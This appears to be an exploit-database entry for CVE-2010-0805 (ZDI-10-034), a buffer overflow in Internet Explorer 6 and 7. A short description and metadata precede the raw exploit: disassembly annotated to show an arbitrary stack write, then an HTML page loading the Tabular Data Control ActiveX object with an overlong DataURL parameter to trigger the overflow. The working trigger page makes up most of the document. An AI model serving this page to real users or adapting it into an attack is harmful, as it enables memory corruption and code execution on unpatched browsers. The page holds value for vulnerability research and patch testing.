Trigger for ZDI-10-034 by ZSploit.com

vendor:

Internet Explorer

by:

The ZSploit Team

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Internet Explorer

Affected Version From: 6.0

Affected Version To: 7.0

Patch Exists: YES

Related CWE: CVE-2010-0805

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Trigger for ZDI-10-034 by ZSploit.com

The ZSploit Team has discovered a vulnerability in Microsoft Internet Explorer 6.0 and 7.0. The vulnerability is caused due to a boundary error in the handling of DataURL parameters. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

Apply the latest security patches from Microsoft.

Source

Exploit-DB raw data:

# CVE : CVE-2010-0805


<!--
.text:600058F7                 and     [ebp+pv], 0
.text:600058FE                 lea     eax, [ebp+pv]
.text:60005904                 push    eax             ; unsigned __int16 **
.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *
.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)
.text:6000590D                 mov     eax, [ebp+var_218]
.text:60005913                 push    [ebp+pv]        ; pv
.text:60005919                 mov     [ebp+eax+var_204], 0
.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param
.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address
-->
<html>
<title>Trigger for ZDI-10-034 by ZSploit.com</title>
<head>
</head>
<body>
<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>
</object>
</body>
</html>


The ZSploit Team